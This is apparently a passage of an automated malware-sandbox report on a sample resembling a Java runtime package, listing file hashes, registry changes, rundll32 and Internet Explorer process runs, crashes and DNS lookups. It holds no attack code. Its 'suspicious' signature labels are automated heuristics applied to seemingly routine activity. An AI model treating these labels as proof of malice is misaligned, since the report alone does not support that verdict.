memory/1676-504-0x0000000002898000-0x00000000028A0000-memory.dmp
memory/1676-503-0x0000000002828000-0x0000000002830000-memory.dmp
memory/1676-502-0x0000000002890000-0x0000000002898000-memory.dmp
memory/1676-501-0x0000000002888000-0x0000000002890000-memory.dmp
memory/1676-500-0x0000000002840000-0x0000000002848000-memory.dmp
memory/1676-499-0x0000000002838000-0x0000000002840000-memory.dmp
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 392f34096439ab16d007f406d57f36a3 |
| SHA1 | 9bc126dc9680dff732c03da0186c0b99e77502c7 |
| SHA256 | 0d1697779b71abf6fe040f5ebc7383dbb6f075a7221af03526f0b5e42d165fdc |
| SHA512 | 2f7dbc5130fc85dfd037ca4fc20f1262f03e8b909522f07ce87656bd611a594934a2e35dc4ded0c1b2e240c4a8ab588ffdf3c81aed6ead50d2ea8608bd78c1ec |
memory/1176-537-0x000007FEF7340000-0x000007FEF7498000-memory.dmp
memory/1176-539-0x000000013F520000-0x000000013F618000-memory.dmp
memory/1176-541-0x0000000140000000-0x00000001402B5000-memory.dmp
memory/2420-543-0x0000000077BE0000-0x0000000077D89000-memory.dmp
memory/2420-544-0x0000000074D90000-0x0000000074F04000-memory.dmp
memory/2812-546-0x0000000077BE0000-0x0000000077D89000-memory.dmp
memory/2812-547-0x0000000000400000-0x0000000000465000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabC026.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarC058.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
Analysis: behavioral5
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
120s
Max time network
131s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 904123715e18db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea2200000000020000000000106600000001000020000000fc5f2b1b1738ceea365af3753a4a7ca64d79b890c03037e6af8d2c386e40e887000000000e8000000002000020000000e4edbdbb3f7426acf93ffd0d2fd2e1f75088c9e23670eeb3a6dc259181b0f2c420000000dbeae45304b38368d5f75e1d78086ca77839c1705247b10c9e21005a2f7fca9840000000693e3f407565753ede0d3ab93b79d566bf14e509466bbb1614727986931f2fc72ed773fa012de0ca39049653e053aca0b8c704949d251307a158bac28e54d8c9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434429020" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9CA62BC1-8451-11EF-87E3-523A95B0E536} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea220000000002000000000010660000000100002000000048158d8cdf3b8b978530881458b4774b380fad584beb8b7fbe722e19e8011149000000000e80000000020000200000006866b45e850ca05a50b7c61335e64e30f2f68819d938e3006986762a1b8c42c59000000007e620b7a8f328e73ba63bcde3d96b99baf86aac2dbe9702d87098a41adc8f315b5ba699236ab9dacd0c4ee33fe506d6f425f4124b0be9a63e6f2af7857999c6dada36f222841fc6d1a249f56297e65507cf44dbfddda66ff73b3634eed3fb66d2c71291dc63a68862a0584191df554b528efb4c2ae204db1eed112200686633a2b64a299fafbd7051738a160d6f9d784000000075dc1ef4d3c7a8e1a7568f7a70e0942b8854f8ed6e928fe442efb9871fba76e6f2073deffb7f4e49e592f33de7ab3a6feb2a83c7fffdc077d41855f5737047d8 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2284 wrote to memory of 1708 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2284 wrote to memory of 1708 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2284 wrote to memory of 1708 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 2284 wrote to memory of 1708 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2284 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\CabEDDB.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarEE6A.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0ec9a4140e8244dbe3f9b879b5c22bc5 |
| SHA1 | 31e3e366b57cfcc24f340a13a0f2158753cbd852 |
| SHA256 | ebbb7d858ff871287cc70d3a44666c3ed03cf697ecda0410aa0be24de84ad525 |
| SHA512 | df6200434f5ab24f73b2803126a5a5430850d632c12aae5bd5cc4a5964bd903d47b3cebb750e41563ed19b22ce799d964bcb60acbdbba57319b3fa69224dfae6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 10f348810b256083f05c05673bdbf84c |
| SHA1 | caabc2f0d064a7285de26a7d28af55c62fd2d440 |
| SHA256 | 4910466e73486089139236f158e9ba4af883658c125a7fd2295c1a129af21cf6 |
| SHA512 | c2c3f3e3aff109b7d4dafd57d669989d7faa1b2cab4290e05046b89c7d06e702dffda6dcb64dc3ecc256b510be8e4316f2ce9238845b6fc75bef5bc1b1da95a3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 0685124819f11c5562d61f8dd9c6f46d |
| SHA1 | f0326952bc2f9a660770cb179347065391d9a3a1 |
| SHA256 | 4794bdd23c4251f5c39f5bec2660f4945d9ec5c0ef10eddfa0ddd79493f1f963 |
| SHA512 | 0f460934f31e9a4aeb2d76a6ecaf562c5d8b118ce680cfe31aba8d1b70e95bec0f057fcee638a15b38c483baf1ced53ecf9f659d1b3187e0614256b7b691b1e3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3dcb5a9bfa5da5cec462205e921dc4a6 |
| SHA1 | bae3db3a7b099813b90e64192a5f17552bc09d35 |
| SHA256 | 5e4b6ffac44cd3badb6a67c0818ae109222b8ab5999529a9acf9fcca45537707 |
| SHA512 | f09ad1148aa7fb26151124dbd0ae1a58f2b4b64a9bf673c2eba44b952dc47015e449d882a7a1f506cf5fffa43c0d0ca840820086bc1afff0189129fd37c1f8c4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d826c86d0f105c17f73bb7fdcf18fd0d |
| SHA1 | 74f4716a67a64ddcd8290d40d25b1e89aef1239b |
| SHA256 | 77295ef490ff4aa3c1c23b719987c35dcd247cdf52504f1b26237a3ca1de8c26 |
| SHA512 | f7cc087582f499725d15c24136d3ef719c0f80f142413ce8d2e87a64aa5799f95c468e4e6b83e718c8c4e65a38138c256fae343738979560511ca7a518caceb5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5febcb4745031b0e80920653ec4d9bcb |
| SHA1 | bed9031111c0b1a5ca01f59c682811150d35a68a |
| SHA256 | 80013ddfae8009596f44d468a8a8aa0a141ac58149a42f20f4ba889f541dc41b |
| SHA512 | 1accd066fba845a8185478bee2a85480977723efa5638b11f9de8e682a28c46f6e47fb232cdabf0eb99df149c2954c8428db7aa7d7370de54de09c04ebe3e00a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c2b455b13e2891f80e727e472048a792 |
| SHA1 | b033671820a3af31045c35d0ae0a4bd6a8da23c3 |
| SHA256 | 2d73e17b680c6a8a4c8a1159ff682cea51234c1f0790948f789b202ee24c6eac |
| SHA512 | c386e3578e739bdd79a734f3a65c939c891d3eac3b8c5dde0f23501ad8dc7cf4223d8d8186a1bffee213ea43c6e1c90464db77e89cc31d271471799119b558ff |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3bc80a2cf207dbcd2b684f84ce0928d2 |
| SHA1 | 98ca7e0a3cdaa6aa8603c2890a91d23d96a4c556 |
| SHA256 | 3ff738059cb89209820f748e8b56fb8c70eae6b7a9eb8d6ca48b0cf4fa6aec6a |
| SHA512 | 43a3392d4733be4517123ee274f35af0c60791a0444605c7a1e298d28fbb88150aea2a469877ff94e204c98ce4891aa07f9ee27edfeaa8a3f72b38cc01884528 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e849a0808462f9caf8a956735b229be7 |
| SHA1 | 9dcf6f02e48074cb92da4da0ee451cad4ad1ac27 |
| SHA256 | 10b52a339a552a125856e7633c9030a7bb4bcfefa473061fa6ac953094371cf8 |
| SHA512 | 94caf6f5b2851e12fe9b308a5ab9a9a3ffa6a7cbbc45e9a4af32a369616a2ea7f43f7827efe5216f8cc358bab91cf5d33165e58c8332ed40a160432f971d907e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f5a2ffdf57d566736a31f021dc575127 |
| SHA1 | 05e9388feb9f72a3de56df17bc50dfd9d04312d8 |
| SHA256 | 6fe1fca054accd041df797adca4c6dd0e8a165c4c79491574e681a048b4c2e10 |
| SHA512 | 9e55692b914ec93c46d6658973945e0adaf1b03ac0dd726890d4cb6d4bc223003070c050a344c26657febac37fe03ea4318bc4a0702051a11227d7cc0c39702a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7e2ca153b1ee6d25712915734c5293b5 |
| SHA1 | 70ddf486d8ef088fc1ae39f402e07229d1df7b64 |
| SHA256 | 79a4805b777bf69c5d58a663184d0ca32edafe7e983c34448a0836fcf577476b |
| SHA512 | 9397a7e799ccb00dfc40a72b142e1266c0505372b7bd596b3d6a85d5a48d1dd247bb4fa94daf3207dfc5b9515039ac192842a9c6c4f2b215e1d6cb044f3a50f7 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | de9702485425109b4737b0108cc6d2fb |
| SHA1 | 91139027e515529254e31a60e26398551d3d6cca |
| SHA256 | 5e86fbe5362e1d7d677f89fa89177f9dd4e0582058896b25bc1288b496e95399 |
| SHA512 | 4c7c06458f90630a2e5f218e917f3aef04aa0b5bed1711fc6012834aee9dffc5d8c5bbcb39233bebd04b5f4ab4fbb7b61a0424c6a5d3568c533821c193f227ec |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 48972917c7dfe71091ebd8b464f6cd5b |
| SHA1 | 207840abeb2d97c979a4391f970db72ce2d31f4f |
| SHA256 | e938469efdd046d26861b1961f83f1c4ca4a4f2464956cd1e7bfa2312121f237 |
| SHA512 | 0109f925f9656046ffb8c1995b9f20076587b37cf8b4b163adf65034d99c9969f8d786f03cb1c4ced4a89a503d61f3708bcbf89ec2257e65740e33ad9f4de872 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7708dc1810836fd3c31d1b98114c6456 |
| SHA1 | 4c42fcf8c4789453deff51aa7217ce2ac8cdb53c |
| SHA256 | 71650edbf23d7dc54a9283cb944f9e7ed598255d83174b1b7d6c9438f734c900 |
| SHA512 | 5e50a61c8845c52755644bfde200031390f233127b451ac3a79afaf44083169bc5afb682eb6f9ba7efb23411b3f4b84af3e7efbe9d85a9ec80b0b2fa4330dfc3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 63733f420e43930fdd499cc13f52e71c |
| SHA1 | 31b4aa934675fc35df0c6c39f09fee4fd82e295a |
| SHA256 | 41d5c5174c72138615dff393f11721c322d74dd0988a81128fc2d11f78dca995 |
| SHA512 | c904b308fb9da425083a1e3ddeb902369379561bdcf946c28cead16a1f195f671d9b51d675c84a62b58414c0743de8ba941fa957db202dd62375db1ab8b8243d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ccdabe60945c0f681ad8ed0d6f6ee843 |
| SHA1 | d2309dd9ee63386e106fd9bc873bc5288655896e |
| SHA256 | a0ab24d525228a882e0d151e7e6a23fc1e73c449e18c58fc63142fb919bd08c9 |
| SHA512 | 91030ee1aba1625655ea24473c84a21b8011eb222bfcc35e84390a31ee0c40d2dd913ec0ba4802b8ae4ba44ca6d1b48317a77d4fa529aa93c451631d72c679fa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | aeecc204b465fafca77da2fea1938103 |
| SHA1 | ad3011de4104319a160f23bbc6f393378be9fa2f |
| SHA256 | 995e0be3b29957ced20c0a0b0bf172d339bed584e6e094dbdb003d03178c961b |
| SHA512 | cc0d32bb32ab56ff32c4c4ff4565ce968912521d45dce05cf77ebf9bbc51fe2d9529f90c386e3a7917fad9457eb40c1fa3c9c277fdfd56db7950875b8f74c564 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5c154d2a18eed7b38b24a9654af61801 |
| SHA1 | 915a37e797416b7b40d64bb42339d3ea037c2cc1 |
| SHA256 | b0682d6a4523fbc2ca13a8d905d3a0c816750f9227c8f270bb3c3c16aa36f442 |
| SHA512 | bd4d34857983a6bcdf3ed8c78aa031f52fc6fe556aafa41adea9ce1b74f75f6be021ffcc0d70a1886600e24082f49cb64dd699b530da5dfdf35c50f20888c884 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 14492f034fd2828ad62c99e04c9c5e94 |
| SHA1 | cbc3fa9abd3dda7e0d8b5fd551e9882195b3bfd3 |
| SHA256 | c9ca9a7b7b43c86f62b2a51383614eae8f4c8f6b2ea21fec95b6ebaab3435517 |
| SHA512 | 92f46d9aaedd6fdff122960c48f0cb7280b1d9451266251fd20bcb8075d665308ce1c4ceca061a931881f49c418d19553a93ac3bb1edea2f42463c2b51ca3541 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
91s
Max time network
157s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3372 wrote to memory of 4464 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3372 wrote to memory of 4464 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3372 wrote to memory of 4464 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4464 -ip 4464
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 640
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral28
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win10v2004-20240802-en
Max time kernel
89s
Max time network
154s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3904 wrote to memory of 2032 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3904 wrote to memory of 2032 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3904 wrote to memory of 2032 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral29
Detonation Overview
Submitted
2024-10-07 02:11
Reported
2024-10-07 02:15
Platform
win7-20240903-en
Max time kernel
105s
Max time network
19s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1
